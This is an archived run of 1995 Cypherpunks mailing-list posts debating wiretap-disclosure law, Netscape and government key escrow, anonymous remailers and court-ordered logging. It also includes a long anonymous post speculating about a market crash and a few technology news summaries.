person wiretapped that this has occurred, despite the >> fact that there was apparently never any precedent for this practice before >> the "wiretap era." > >Because Congress passed the Electronic Communications Privacy Act which >is codified, as amended, at 18 U.S.C. Section 2510 et seq. Section >2511(2)(a)(ii) states in part: "Notwithstanding any other law, providers >of wire or electronic communication service ... are authorized "are authorized"? You mean, NOT REQUIRED, but merely "authorized"? In any case, this doesn't explain why this is CONSTITUTIONAL. I hope you understand the difference. >to provide >information, facilities, or technical assistance to persons authorized by >law to intercept wire, oral, or electronic communications ... if such >provider ... has been provided with [a court order or a certification by >an appropriate official that a court order isn't required ...]. I realize that a phone company might not normally be expected to refuse to cooperate, but the way the thing above is written, they are merely "authorized" to do something, they are not required to do it. >> In addition, I would like to be able to figure out a method to allow the >> de-facto disclosure of such activities, and to in fact force the phone >> company to do so, if they are asked to tap my or anyone else's phone. It >> occurred to me that even if there was a prohibition on explicitly revealing >> that such a tap exists, it should be possible to require the telephone >> company to certify that no tap exists, and to require that this >> certification will be followed by an explicit and immediate de-certification >> message the moment the phone company is unable to maintain such >> certification. The receipt of such a letter/fax/email will indicate that a >> tap has been placed, despite the fact that it will not say so. > >Sorry. > >In subsection B of the the statute I quoted above, it states in >part: "No provider of wire or electronic communication service ... shall >disclose the existence of any interception ... with respect to which the >person has been furnished a court order or certification ... except as >may be otherwise required by legal process and then only after prior >notification to the Attorney General or .... Any such disclosure shall >render such person liable for the civil damages provided for in section >2520. Sorry, I don't think that's a satisfactory answer. First, it would presumably be possible to disclose the WIRETAP ORDER without explicitly disclosing the existence of the "interception" as stated above. Admittedly it would amount to the same thing from the standpoint of the person wiretapped, but as far as I can see it would not LEGALLY be the same thing. The letter from the phone company will state: "We have received a wiretap order from the court listed below. We have not YET acted on that order. We are not disclosing the existence of any interception, and we cannot legally do that. You are forewarned!" Or, more coyly: "Normally, we can reassure customers that their telephone lines are not being wiretapped by the police. However, during the period of January 15, 1996 through January 30, 1996 we can no longer give you that assurance. Please take care during this period." Note that I am assuming the willingness of the phoneco to be UNCOOPERATIVE, at least according to "the spirit of the rules." They could still cooperate according to the LETTER of the law. > No cause of action shall lie against in any court against any >provider ... for providing information ... in accordance with the terms >of a court order or certification under this chapter." > >Thus providing evidence of that one of the uses of lawyers is to [attempt >to close loopholes. Which is an excellent reason for implementing my idea, "Assassination Politics." From sameer at c2.org Sun Dec 3 23:20:36 1995 From: sameer at c2.org (sameer) Date: Sun, 3 Dec 95 23:20:36 PST Subject: "Got a subpoena?" In-Reply-To: Message-ID: <199512040715.XAA07095@infinity.c2.org> > > Note that I am assuming the willingness of the phoneco to be UNCOOPERATIVE, at least according to "the spirit of the rules." They could still cooperate according to the LETTER of the law. It's in the phone company's best interest to be cooperative. *but* in the case of, say, an internet privacy provider, it is in the provider's best interest to be uncooperative. -- sameer Voice: 510-601-9777 Community ConneXion FAX: 510-601-9734 The Internet Privacy Provider Dialin: 510-658-6376 http://www.c2.org/ (or login as "guest") sameer at c2.org From unicorn at schloss.li Sun Dec 3 23:32:40 1995 From: unicorn at schloss.li (Black Unicorn) Date: Sun, 3 Dec 95 23:32:40 PST Subject: GAK Flap Happening at a Good Time--Journalists Read! In-Reply-To: <9512040703.AA14762@pulm1.accessone.com> Message-ID: On Sun, 3 Dec 1995 blancw at accessone.com wrote: > > Uni, if you're so overwhelmingly and absolutely incensed with Netscape, why > don't you write to Jim Clark yourself and tell him about his spinelessness and > all your other opinions of him, his unaccceptable attitude, and his worthless > company, instead of getting granular with Jim and Dan here on the list? > > After all, Jim Clark is the one who made the unpleasant statements. > > .. > Blanc > I would hope that other's might recognize the trend in Netscape and work to act as I have. I have written Mr. Clark. > --- My prefered and soon to be permanent e-mail address: unicorn at schloss.li "In fact, had Bancroft not existed, potestas scientiae in usu est Franklin might have had to invent him." in nihilum nil posse reverti 00B9289C28DC0E55 E16D5378B81E1C96 - Finger for Current Key Information From jcobb at ahcbsd1.ovnet.com Mon Dec 4 00:43:07 1995 From: jcobb at ahcbsd1.ovnet.com (James M. Cobb) Date: Mon, 4 Dec 95 00:43:07 PST Subject: Diskless "Eunuchs" Machines Likely to Fail Message-ID: Friend, 12 03 95 Edupage reports: SUN PLANS JAVA-LIKE MICROKERNEL Sun Microsystems is already working on a microkernel-like operating system to run low-tech "Internet appliances." Dubbed Java OS, Sun's chief technical officer Eric Schmidt calls it the "natural next step" for Java. The new software will "take the Java classes and put them on the mini- mum OS functionality you need. You can add additional functionality by writing in Java," he says. It will require only 4 to 8 Mbytes of memory, and will not support Windows applications or other programs that make large demands on system memory. "This thing doesn't come with Sound Blaster and speakers. If you need a PC, buy a PC," says Schmidt. (Information Week 4 Dec 95 p104) The condescending tone illustrates the points made by wfgodot at iquest.com on 11 30 95: It seems that many corporate types are fixated on the idea of tractable and predictable consumers. [snip] The approach to understanding the actual dynamics of why people are and will increasingly come into this space and what they will want to do once they get there is deficient for many. [snip] Others are puzzled, or are overtly threatened by the idea of potential consumer's who are also content producers. Cordially, Jim From mark at unicorn.com Mon Dec 4 01:41:36 1995 From: mark at unicorn.com (Rev. Mark Grant) Date: Mon, 4 Dec 95 01:41:36 PST Subject: Do the Right Thing Message-ID: On Sun, 3 Dec 1995, Timothy C. May wrote: > "Events planned for this year's conference include: > > - Federal prosecutors square off against civil-liberties lawyers > in a Supreme Court test of the "Cryptography Control Act of > 1996", which criminalizes non-escrowed encryption." Shouldn't that be the "Child Protection, Anti-Terrorism and Electronic Privacy Act of 1996" ? Mark From anonymous-remailer at shell.portal.com Mon Dec 4 01:43:08 1995 From: anonymous-remailer at shell.portal.com (anonymous-remailer at shell.portal.com) Date: Mon, 4 Dec 95 01:43:08 PST Subject: Do the Right Thing Message-ID: <199512040942.BAA22190@jobe.shell.portal.com> On Sun, 3 Dec 1995, Timothy C. May wrote: > Netscape, being the dominant browser company, and Microsoft, being the > dominant OS company, are in special positions to "build in Big Brother." > I'm not claiming they are, just that they are clearly in a position to make > it technologically more feasible to make non-GAK illegal. They both need to > carefully think about the role that's been "given" to them (whether by > fortune, hard work, or being in the right place at the right time) and do > what's right. That's always a tough position to be in. If Netscape or Microsoft knew what was the "right" thing to do, I don't doubt that they'd be doing it. The problem is always that there is no crystal clear "right" answer on lots of these issues. Everything is always "fuzzy" because of the possible consequence that flows from action. > Strong words, perhaps, but the implications of mandatory key escrow are > quite clear. We debated these points for a long time during the Clipper > debate, and later when "Software Key Escrow" began to rear its head. I > won't repeat these arguments against GAK here, but will take this > opportunity to quote from a new book that actually quotes my words: Good quote, Tim. I'll lift a glass of eggnog at the end of the "open door policy" as well. It really doesn't serve anyone's interests at all. My concern is the policy wind-down challenge. It can call for a real strong stomach sometimes, as Greenspan could probably attest. It probably shouldn't be embraced except by the most foolish of fools. > And time is of the essence. Things move very fast. It is no longer the case > that a law is passed, then companies respond to the new legal regime with > their own policies and products. Companies, especially in high tech, are > "partners" from the start, as we saw with the Clipper development (where > AT&T had known about Clipper for years prior to the first public > announcement, and was cooperating in the development of it, not to mention > the other companies such as Mykotronx, VLSI Technology, etc., which were > involved in secret for years). Sure, this isn't news to anyone. Time is now compressed. There usually has to be some lead time to these things. AT&T as an example has been well rewarded -- in fact, some circles might suggest that they were overly well-rewarded -- when they got a $1 Billion plus preferential contract in the Middle East (Bahrain, if memory serves ...) following Desert Storm. Does this then mean that anyone should be surprised with Thomson-CSF's alternate means against Raytheon? Not this cowboy. We're into a completely different altitude of engagement here. Completely different. And in this case, we not only face an enemy, but we're surrounded with civilians who can get caught in the cross-fire. No different than the orphans who were used as human shields in Bosnia. These companies generally need to be briefed early on what the action plan will be and on the possible range of consequences and the attendant probabilities so that proper contingencies can be drawn up. Unless of course, these companies are actually your adversary, while posing as your friend, in which case it's best to keep them out of the loop altogether. Probably best just to amuse them, as you do a child in a crib, while you go about your affairs. > It is only sheer speculation on our part (some of us, at least) that > negotiations about GAK have been going on with the major software > companies. Jim Clark, for example, learned what he knows about key escrow > _someplace_, and it probably wasn't from our list or from articles he'd > read. I'm betting, but could of course be wrong, that he and other folks at > Netscape (and I mustn't leave out Microsoft, Sun, SGI, Apple, etc.) have > been briefed on key escrow and that various negotiations are already > underway. This would match how things were done with Clipper, and would > explain Clark's voiced support for the need for GAK. Clark's voiced support for GAK is one of the most insane ideas I have come across. Does he have any idea of what he is tinkering with? Does he know how to play his tune of Tommy the Tinkerer?? Somehow, I have doubts. Serious doubts. His GAK comments could trigger a very nice cascade throughout the entire high-tech sector which could spill over and out. "Friendly Fire" could be deadly to some American financial powerhouses. Not only could Jim throw a monkey-wrench into the exit-strategies of valley venture-capitalist's, but this whole scenario could well spill into other issuers if he's not careful. To understand, the market truly is not looking at Netscape as a "software" play. It is the quintessential Internet play -- a whole "new" economic sector. The sector which many Dow firms (IBM, AT&T, and Disney) hope to exploit as part of their mid to long-term business plans. Future earnings forecasts and indeed valuations up and down the street are based around the assumption of Internet success. Jim is playing with fire, if the audience he's _hoping_ to address isn't listening to him while _another_ audience in fact is. Anyone who doubts this, or thinks that the markets aren't particularly vulnerable and sensitive, shouldn't listen to me -- who am i -- they should listen instead to the true "professionals". Here's what Doug Casey, an investment adviser out of Baltimore is writing: "We're at the tail end of one of the great manias of history, where value is thrown totally to the wind and everybody with two nickels to rub together plans on making a million with mutual funds. I sincerely hope that all the best happens and the market goes to 10,000. But I'm not planning on joining the party. Since May, 1985, when the mutual fund assets market reached a $100 Billion (US), asset growth has gone hyperbolic. Half of all the money in equity funds has come in during the last TWO years. It's a mania of historic proportions. It's completely and totally insane." I might go one step further, and ask the thorny question of how much of that recent mutual fund investment -- the "hot money" that's come in over the last two years -- is actually "leveraged money". How much of it is borrowed funds? Probably a pretty fair chunk. Then I might ask how many of these casino bets, are with money that people truly can't afford to loose. How many IRA's or college funds are invested either directly or indirectly in Spyglass, or some other darling?? Instead of prudent "blue-chip" stuff, that couldn't *possibly* ever take a big hit -- parts of the Dow Industrials -- like AT&T or Disney?? Again, probably a fair chunk. Let's suppose that as a result of Jim's GAK comments, people loose faith and ask to redeem their mutuals. What's the cash-position of these funds? Do they have the liquidity to meet the redemptions or will they have to engage in selling wave after selling wave -- selling everything regardless of "fundamentals"? And then will the across the board selling cause ever more redemptions as hopes and dreams fade and as reality sets in? Maybe, I'll help answer that question, by quoting analyst, Leo Hood, from Gainesville Florida, who spoke of some of the risks and attempted to debunk the perceived "safeguards" when he wrote: "One by one, investors have moved their money out of conservative investments and into growth funds and high-tech stocks. Many feel this concentration of power in the hands of a few is a safeguard against a horde of small investors selling all at once. I think the opposite is true. With funds down to very low cash levels, a panic by individuals is likely to make matters worse." Hood is correct in this case, about the present state of mutual fund liquidity. It's next to non-existant. And Hood raises another market vector to contend with. The so-called "safeguard" no longer resides in broadly distributed wetware. Instead, everything is auto-pilot. The safeguard -- Mr. "Safeguard" Circuit-breaker investment fund manager -- can't default on a client redemption. If he doesn't have cash in the bank, he has no option but to raise cash by selling. In fact, he might not even have the authority or discretion to determine what he'll sell. He might be forced to follow the Investment Committee's guidelines and formulae. He might even try to play hero, and over-sell near the perceived market "top" to meet his anticipated future redemptions, and "beat the market", so that he and his fund have claim to future "bragging rights". Seeds for an anticipatory meltdown?? Possibly. In addition to the historic mania for mutual funds, Alan Newman from Great Neck, New York tries to help out and give us some historical perspective on where our market sits, historically. He looks back many years and writes: "The dollar value of all U.S. stocks now amounts to 85.9 per-cent of nominal GNP -- far and away the highest such reading of all time. Prior peaks in August 1929 at 77.4 per-cent, December 1968 at 79.3 per-cent and December 1972 at 80 per-cent were all followed by brutal bear markets that lopped off at least 21 percent in value over the next twelve months. Two of these times, 1929 and 1973-74 -- marked the start of the two worst bear markets of the century. To understand and give Alan's words some context, especially his observation that these nosebleed valuation levels were invariably followed by spectacular historic corrections, let's remember that his data reflected old fundamentals. The old-style market. This is not '29 nor '73-74. Back then, we didn't have the compressed ultra-sensitive global market we now face, where a sneeze turns into an earthquake. We also didn't use the complex financial instruments (many of which are off-balance sheet) like we now do. And we didn't have duelling neural nets in charge of trading. The seasoned professionals with the experience and human reason and judgment to manage these events are gone. The ones who had the authority in the past to exercise their "judgment" in managing new "unlearned" events have had all of their authority stripped from them. That authority now sits in other hands. In silicon. During '29 and 73-74, the markets certainly weren't facing the type of optimism that we're facing today ... (well maybe, in '29 they were.) An optimism which has been fuelled by the media. Including such memorables as the Rolling Stones "Start me up" which I've heard hummed in elevators. They weren't facing the "News" on the front page of every major periodical and the near constant bombardment on the "Internet". And no one need mention that nifty icon in the corner of every computer screen. The coverage has set individual expectations to unattainable levels. All of the above, might well come together to form a "series of factors" which act serially -- factors which will magnify market swings. If all of this hasn't helped convince Jim, perhaps Paul Franke from Kansas City might shed some additional illumination on the present situation. Some recent history. He tried to look at the current market within a narrower time frame than Alan Newman's long-term historical. He wanted to give some current (twelve-month) context for our consideration. He wrote: "In late 1994, skepticism and pessimism among investors were very high. Mutual funds had cash levels of close to 10 per-cent. Some 60 per-cent of investment advisers were staunchly bearish. Interest rates were high after rising all year. Inflation seemed to be picking up steam. Today, the stock market is in the opposite position it was a year ago. Futures traders are more bullish than they have been in several years, and mutual fund cash levels have fallen to near a record low. Cautioning investors to watch their step may prove to be an understatement." Some very good advice there from Kansas City about watching your step. We have many other vectors to consider. One, is the manner in which mutual funds report unit-holder value. Mutual funds do not present and publish a "real-time" value. The reported NPV lags the calculation. The value most people see published and what they will react to, is not actualy where "it is" -- it's actually where "it was". This information "air-gap" will tend to make the unit-holder reaction time much longer and will tend to continue and give life to negative news, as well as presenting exploitation opportunities to market professionals who have an information advantage. Domestic and International Pros will use this "feature" to calculate and approximate the reported unit-holder value before the report hits the press. On the basis of educated "guesses", they will likely trade through overnight or international markets to pre-position themselves prior to the general release of mutual fund values to the American public, again magnifying the raid. This combined interplay -- between the public and the professional -- would respectively extend the reaction period and, magnify intra-day market movements. Or in plain English, it would last longer and be more volatile. Or much more succinctly, as Irwin Yamamoto said, "_Mutual Funds_ will be an obscene expression." The full impact would of course require a full analysis and model of another vector, that of the entire futures market and that of international arbitrageurs. When they smell blood, they tend to behave as piranha. Arbs and "vulture funds" have the resources -- personnel resources as well as procedural resources to preferentially position themselves such that they have an advantage of trading execution and a preferential view of how market buy/sell orders flow into the theatre of the exchange. Both professional types are prepared at a moment's notice to jump in or refrain. They can assess track record's, determine capitalization's, psychoanalyze the personalities of everyone involved and phone everyone in their Rolodex looking for some clue and subtlety to play. (Arbs not only have Breaking News Co-ordiantors but are also privy to particular intelligence. They recall how the market-makers took it on the chin in '87 and had to go to the window. Many market-makers made great sacrifices in attempts to maintain order during '87. A sacrifice they may not willingly make to ensure system-liquidity now.) All of these factors (and many more) will tend to interplay in one big international soup. Clearly, Jim is not only in position to influence the future of GAK, but he could cause a great deal of trouble throughout the chain of the US financial system. The market does not need a jittery Chairman, going on about GAK. No one is served by this type of play. I doubt the President wants a market meltdown as we start to move towards an election year. Body bags and a bad economic front are a bad mix and could swing the whole election with the dual near unsurmountable election obstacles. Then again, Bob Dole probably wouldn't want to take hold of the Presidential reins in that environment, either. As an endnote to something that really wasn't relevant to Jim's GAK comments, something which veered off and almost assumed a life of its own, I'd say that the probability of the foregoing is certainly in excess of one chance in ten. > I hope Jeff W. and Jim C. can have some _long_ chats. The stakes are too > high for product decisions to be made without full awareness of the > implications. Yep, we're in "the shit" as they say. > The statements from Jim Clark do tend to imply a kind of > defeatism, and even Jeff's comments seemed laden with qualifications about > "only if the government requires us to." As Hal Finney noted in his post, > it's as if the Netscape people are preparing for the inevitable. Maybe it's > not an indication that GAK is being considered within Netscape, but maybe > it is. After all, one rarely hears "only if we have to" qualifications on > things that are truly from out in left field. Preparation can be a good thing. I still think that coming out and saying what is being said, is risky business. It is a comment out of left field. But then I'm not privy to all the variables either, so take my comments with a grain of salt. > (A side point, somewhat abstract: The dominance of Netscape, rising from > nowhere to becoming the major player in this debate, illustrates a point > about "monocultures" and their ecological effects. If yellow corn is good, > replace other strains of corn with yellow corn. Pretty soon, the world's > corn output is 96% yellow corn. Some ecological downsides to this. In this > case, Netscape is becoming the yellow corn of the Web, and an obvious > "choke point" for the NSA and its sisters to mandate crypto policies. > Hence, the role of non-yellow-corn alternatives...) Yep Tim, I'll agree with you on this. I think Maurice Strong has also been saying something along these lines for some time. Warning about systems and monocultures. Sadly, monocultures can develop without our even seeing it. Or at least, I think Maurice has been saying something along those lines in his own fashion. > And what Netscape agrees to put in future releases of its browsers or its > servers could have dramatic effects on the whole climate. Sure. Just like Christmas in Bosnia will, undoubtedly. 'Tis the season ... Hopefully, god-willing, we won't face any tragedies. Alice de 'nonymous ... ...just another one of those... P.S. This post is in the public domain. C. S. U. M. O. C. L. U. N. E. From unicorn at schloss.li Sun Dec 3 10:21:52 1995 From: unicorn at schloss.li (Black Unicorn) Date: Mon, 4 Dec 1995 02:21:52 +0800 Subject: GAK Flap Happening at a Good Time--Journalists Read! In-Reply-To: <30C178F1.1DC3@netscape.com> Message-ID: On Sun, 3 Dec 1995, Jeff Weinstein wrote: > Black Unicorn wrote: > > > > On Sat, 2 Dec 1995, Jeff Weinstein wrote: > > > > > Black Unicorn wrote: > > > > To the outsider, it looks as if Netscape 'owes' the government. > > > > > > We do owe the government. They have paid us for Servers and Clients > > > that support Fortezza. That is what we owe them. The money that the > > > NSA gave us for Fortezza is not very significant compared to what we > > > are getting from commercial sources. > > > > Obviously it was significant enough to take. It was also a perfect > > opportunity for Netscape to express concerns about the future of the > > technology, which is in netscape's interest. The astute deal maker would > > be happy to work with the NSA on his own terms. Instead, it > > would appear that Netscape is working FOR NSA on their terms. > > I wasn't aware that you were privy to the details of the contract. Tell me it included discussion about the future of the technology, and that at some time during the negotiations the prospect of GAK and netscape's concern over the direction of it was discussed. In the alternative, shut up. It doesn't take a legal genius to figure out what went on in these negotiations. I've been there. I know what the agendas are, and it's clear GAK was not one of them. Either show me otherwise or sit down. (And by the way, to brag and make you eat crow, I have seen portions of the agreement, and your legal staff is as full of leaks as the titanic. You would be wise to pull that card only when you are sure it's not been exposed. Your agreement is another reason I pulled my stock. My biggest regret is that I don't trust my anonyminity enough to publish the portions I have). > > I'd be interested to know what a 'government liason person' is. It > > sounds to me like an 'in house lobbist.' There is an old joke in the > > beltway about in house lobbists. > > > > I also would like to know why you are actively lobbying for > > 'claification' rather than 'modification' of the current policy. > > We are asking for both. We want to know what we have to do to make > our US version available for FTP download to everyone who is legally > allowed to use it, without violating the current law. We also want > the export restrictions removed so that we can ship the same stuff > to other countries. The former is a short term goal while the > latter will likely turn into a longer term effort. At no time in here do I hear that you will be actively taking an 'anti-GAK' position. That is, that GAK is counterproductive, against the interests of the industry and that Netscape is going to take a stand on GAK because it is wrong for the industry as a whole. I don't care what your position is on GAK, I've already sold my stock in your spineless company. What I care about is exactly what kind of snowjob you are perpetrating after the fact while claiming to be one of us. > > > Netscape seems to be taking the position, "We'd love it if you'd let us > > do X, but we are happy to roll over for whatever." > > So you consider not breaking the law to be "rolling over"? You seem to think the only options are: 1. Roll over. 2. Break the law. This is where you fail. The other option is active work to discourage a GAK system on the whole as a farce, and unenforceable, thus a waste and a burden to the industry (which in my view, it is). Unfortunately, Netscape is too interested, clearly, in not rocking the boat while the gold is on board. Again, this is fine, so long as you don't come to us claiming to be the peacemaker. That's crap. > You have the luxury of hiding behind anonymity. We don't. No apologies necessary. > > and "By the way, > > what is the rule on exporting software again?" > > Doesn't everyone want to know this? Do you think that the ITAR is clear > about the meaning of "export" in the case of FTP and the internet? No. I don't care what is. As long as it is not "we know strong crypto is inevitable, and thus we cannot hope to enforce a lesser standard," then it is clearly unacceptable - (See Bill Gates, who despite my provincial mac preference, has earned my investment dollar ten times over on ethics issue v. netscape. I hope you realize exactly what that means). > > I am impressed that some effort is being made. I think it in the form of > > 'too little, too late.' But hey, who am I? > > Four months ago we did not have lots of money in the bank. People seem > to forget that this still a young and small company. Perhaps the current > valuation is blinding obscuring this. Now that we have more resources at our > disposal hopefully we can help make a difference. All the smallest violins in the world are, I am sure, playing for you. You'd make a difference if you would evolve to the point where you have a backbone. Given your position in the short lived 'hype' of the high tech market, I would think you would make as much of your time in the spotlight as you could. Especially if the market ever wises up to the snowjob you are doing. (I speak of the company, if not the individual, not that I doubt either of the capacity individually). > --Jeff > > -- > Jeff Weinstein - Electronic Munitions Specialist > Netscape Communication Corporation > jsw at netscape.com - http://home.netscape.com/people/jsw > Any opinions expressed above are mine. > --- My prefered and soon to be permanent e-mail address: unicorn at schloss.li "In fact, had Bancroft not existed, potestas scientiae in usu est Franklin might have had to invent him." in nihilum nil posse reverti 00B9289C28DC0E55 E16D5378B81E1C96 - Finger for Current Key Information From don at cs.byu.edu Mon Dec 4 02:29:17 1995 From: don at cs.byu.edu (Don M. Kitchen) Date: Mon, 4 Dec 95 02:29:17 PST Subject: ANNOUNCEMENT: ALICE'S ADDRESS REVEALED. In-Reply-To: Message-ID: Someone posing as Alice said: > As I promised, I've now opened a channel so that anyone who wants to > can send Alice de 'nonymous email. I can now be reached via > an455120 at anon.penet.fi. Mail sent to Alice de 'nonymous at that > address will get to me, and I will do my best to reply to you as well, > but I can't guarantee, anything. Laszlo Vecsey said: > I don't think that was a smart thing to do. Your real email is now > registered in some database in Finland - how difficult would it be to > retrieve it? From what I remember organizations like Scientology had no Not _nearly_ as hard as breaking/finding an appropriately encrypted key. I for one am not going to even bother with the penet address unless the posts come from there. After all, it's a forgery anyway. The real Alice already posted a PGP key. I wouldn't be reading this list if I were going to fall over for a simple impersonation. Of course, if our impersonating, trusts-penet-not-PGP-coworkers-think- of-everything-but-a-packet-sniffer Alice were to post from penet, then everyone (including procmail ;) would have to believe his claims of pseudo-identity. I must say, L.D. is really falling all over himself this time. Maybe he's just trying to make people *think* he's a cryptobungler, so that he can keep his other tentacles with whom he converses out of suspicion. Don Wishing Emacs had IMAP support cuz here comes mailcrypt From greg at ideath.goldenbear.com Mon Dec 4 04:03:17 1995 From: greg at ideath.goldenbear.com (Greg Broiles) Date: Mon, 4 Dec 95 04:03:17 PST Subject: "Got a subpoena?" In-Reply-To: Message-ID: <199512041148.AA10690@ideath.goldenbear.com> -----BEGIN PGP SIGNED MESSAGE----- Brian Davis writes: > On Thu, 30 Nov 1995, sameer wrote: > > > What about a court order to (a) start comprehensive logging, and (b) not > > > tell anyone under penalty of ______ . > I am unaware of any authority for such an order. This evening I ran across _In Re Application of United States of America for Order Authorizing Installation of Pen Register_ 610 F.2d 1148 (3rd Cir., 1979), citing to _United States v. New York Tel. Co._ 434 US 149, 54 L.Ed.2d 376, 98 S.Ct. 364 (1977), holding that Fed.R.Crim.P. 41 and the All Writs Act 28 USC 1651 give a federal district court the power to direct a telephone company to make equipment and personnel available to assist in gathering evidence and intelligence as part of a criminal investigation. (Also see 58 ALR Fed 719 "Authority of District Court to order telephone company to assist law enforcement agents in tracing telephone calls", and _Michigan Bell Tel. Co. v. United States_ 565 F.2d 385 (6th Cir., 1977). I don't get much exposure to federal criminal law so I'm way out of my depth re whether that interpr tation of rule 41 is current (or if rule 41 has changed in the intervening 20 years) but it might be a starting place. The cases discuss the telephone companies' status as "highly regulated utilites with a duty to serve the public" as justifying a diminished interest in autonomy; presumably this factor would work against the commandeering of a remailer. Westlaw shows some 860-odd screen pages worth of annotations for 28 USC 1651 and, frankly, I'm not up to reading them, at least not on a whim. According to _In re Application of United States_, supra, and _In re Application of United States_ 616 F2d 1122 (9th Cir., 1980), the telephone company (and likely a remailer) is entitled to an in camera hearing prior to the law enforcement use of facilities/personnel to determine if it is unduly burdensome and/or how much compensation should be paid. The opinions also don't go anywhere near the question of whether or not the phone company had the choice to simply go out of business entirely; I think that option would be more easily available to a remailer. If my remailer were served with an order to begin logging, I think I might prefer to move all of the RAM in that box over to my Windows box, say, so that I could get Terminal Velocity to run with SVGA resolution, or whatever. I do think there's a meaningful difference between asking an enormous business to run their operations a wee bit differently (or ask technicians to work overtime, where the court pays the overtime) and forcing a single individual to reorganize their life around a criminal investigation. (see the discussion of over-burdensomeness) Then again, it doesn't seem so hard for the cops to just seize the box(es) which run the remailers, set them up down at the station, and start watching traffic. This seems to be a factor in favor of running remailers on big systems which would be politically more difficult to seize, e.g., Portal's or Caltech's or some other big multiuser box owned by someone who's already got an attorney on retainer. -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBMMLf/X3YhjZY3fMNAQErsAQAqnZMR1JcO0TiAwIf1O6QG5Xf4UIStL/F H7+4FHG7LREM0puuKHo1ObcSoqiOXNidz08ZTWk8AYyQdOdHlppnzSjXlnv0srZn FkfQXiIJIIBz0MvH4cAGnBHVnQzPKK47LhaUheo4zxV9/8urwjTPeCKeWG/wR538 IEZuefyxxwE= =IK82 -----END PGP SIGNATURE----- From ddt at lsd.com Mon Dec 4 04:43:33 1995 From: ddt at lsd.com (Dave Del Torto) Date: Mon, 4 Dec 95 04:43:33 PST Subject: GAK the Spooks not the Civilians Message-ID: A non-text attachment was scrubbed... Name: not available Type: text/pgp Size: 10401 bytes Desc: not available URL: From jya at pipeline.com Mon Dec 4 04:49:47 1995 From: jya at pipeline.com (John Young) Date: Mon, 4 Dec 95 04:49:47 PST Subject: SEN_sor Message-ID: <199512041250.HAA03141@pipe4.nyc.pipeline.com> 12-4-95. NYPeeper: "The Rand Corporation salutes E-mail as the new foundation of democracy." Denise Caruso's column. Are we ready, as a society, for ubiquitous Government- mandated electronic communication? Not yet. E-mail today does not have the same constitutional free-speech and privacy protections already afforded the telephone and postal mail. In addition, free speech on the Net is far from assured. There are several bills pending in Congress right now that would severely restrict what people can say in either private or public forums on the Internet. Despite Rand's finding that virtual communities are powerful tools for democratic discourse, it will be difficult for communities to form under constant threat of censorship. "Java Backers Taking Aim At Microsoft's Dominance." A number of Silicon Valley companies plan announcements on Monday that together constitute an anti-Microsoft campaign. The most noteworthy: A plan by Sun and Netscape for a user-friendly version of the Java software technology for the Web. The strategies being announced this week represent opening skirmishes in what may be the next great standards battle in the industry. "Nearing the $500 Computer for Internet Use." Acorn is about to introduce a stripped-down machine for Net surfing that sells for about $900. By stripping it of its monitor and hard disk drive, and adding a high-speed modem, Acorn executives say they can hit a retail price less than $500. They plan to ship the Netsurfer by early next year, and are discussing licensing with Oracle and a number of American and Asian companies. SEN_sor (16 kb) From anonymous-remailer at shell.portal.com Mon Dec 4 05:27:04 1995 From: anonymous-remailer at shell.portal.com (anonymous-remailer at shell.portal.com) Date: Mon, 4 Dec 95 05:27:04 PST Subject: ANNOUNCEMENT: ALICE'S ADDRESS REVEALED. Message-ID: <199512041326.FAA19260@jobe.shell.portal.com> On Mon, 4 Dec 1995, Don M. Kitchen wrote: > Someone posing as Alice said: It wasn't anyone "posing" as Alice. It was the real banana. > > As I promised, I've now opened a channel so that anyone who wants to > > can send Alice de 'nonymous email. I can now be reached via > > an455120 at anon.penet.fi. Mail sent to Alice de 'nonymous at that > > address will get to me, and I will do my best to reply to you as well, > > but I can't guarantee, anything. > > Laszlo Vecsey said: > > > I don't think that was a smart thing to do. Your real email is now > > registered in some database in Finland - how difficult would it be to > > retrieve it? From what I remember organizations like Scientology had no Soory ... beg to differ ... my real email is not registered in some database in Finland. No offence, but you have no idea what I have registered in Finland. Whatever lies behind the anon address is simply something which is "reasonably" reliable. It could be a dummy account, or it could even be a chain of remailers and processes. Who knows?? Do you? How difficult would it be to retrieve it from Finland? I don't really know. It really hadn't crossed my mind. I thought that Julf might run a good outpost in Finland. And that he'd take reasonable efforts (i.e. not go down with the ship) to protect my privacy. He strikes me as reasonably reliable that way. > Not _nearly_ as hard as breaking/finding an appropriately encrypted key. Maybe, maybe not. It depends on a lot of things, now doesn't it? And breaking or finding an appropriately encrypted key, doesn't *quite* address the problem of people sending email to me without any hassle, does it?? I think that the ISP who hosts my remailer has already had to deal with a slew of mail over the "Alice" antics, and the spoofed posts. This way, if someone wants to take issue with something which they've read, the ISP can simply ask them to write the author. > I for one am not going to even bother with the penet address unless the > posts come from there. After all, it's a forgery anyway. The real Alice > already posted a PGP key. I wouldn't be reading this list if I were > going to fall over for a simple impersonation. Great that's your choice and your perogative. I don't see what on earth you'd have to say to me in any event. And before you go patting yourself on the back about impersonations, have a look at my last post to this list. The one under the subject of "Do the Right Thing." Right at the bottom of the post is my signature, and ... ta dah ... my penet address. What does that *logically* tell you?? Maybe that the author of that post, the long-winded one that criticizes Jim Clark for his stand on GAK and his short-sighted views will accept email via penet.fi at an455120 at anon.penet.fi?? > Of course, if our impersonating, trusts-penet-not-PGP-coworkers-think- > of-everything-but-a-packet-sniffer Alice were to post from penet, > then everyone (including procmail ;) would have to believe his claims > of pseudo-identity. I trust penet to do one thing for me. I trust penet not to send me email that is larger than 1 Megabyte. And the reason I trust penet not to do that is that Julf's mailer won't handle it. His mailer will choke on it. That's it. If you think that I'm relying on Julf to protect me, then you are sadly mistaken. Many, many people already share in the secret of who Alice is. That's a fact. I'm not looking for anyone to keep my identity a "secret". I'm simply looking for some peace so that I can do some reading, some writing, and some "thinken". And Julf protects me from huge emails. That's it. And now, if anyone wants to establish a dialogue with me, they can. Or if they don't want to (like you) then that's not a problem for me either. My previous way of getting contacted (via postmaster at att.com or postmaster at netscape.com) didn't seem to be working well. The two companies weren't forwarding email to me. Never got anything from them forwarded. Now, not only AT&T and Netscape can talk with me, so can anyone else. And if they want to have some "secure" super-secret dialogue with me, then we can do that also. I've posted a partial protocol on how to do that already. Not one that's for super-dee-dooper secret stuff, but one that's Pretty OK. And it uses PGP for one part. > I must say, L.D. is really falling all over himself this time. Maybe > he's just trying to make people *think* he's a cryptobungler, so that he > can keep his other tentacles with whom he converses out of suspicion. Good Grief. Is it something they put in the water down wherever you're at?? I am not L.D ... oh, what is the point ... > Don > > Wishing Emacs had IMAP support cuz here comes mailcrypt Mailcrypt?? Emacs?? *Shudder* ... 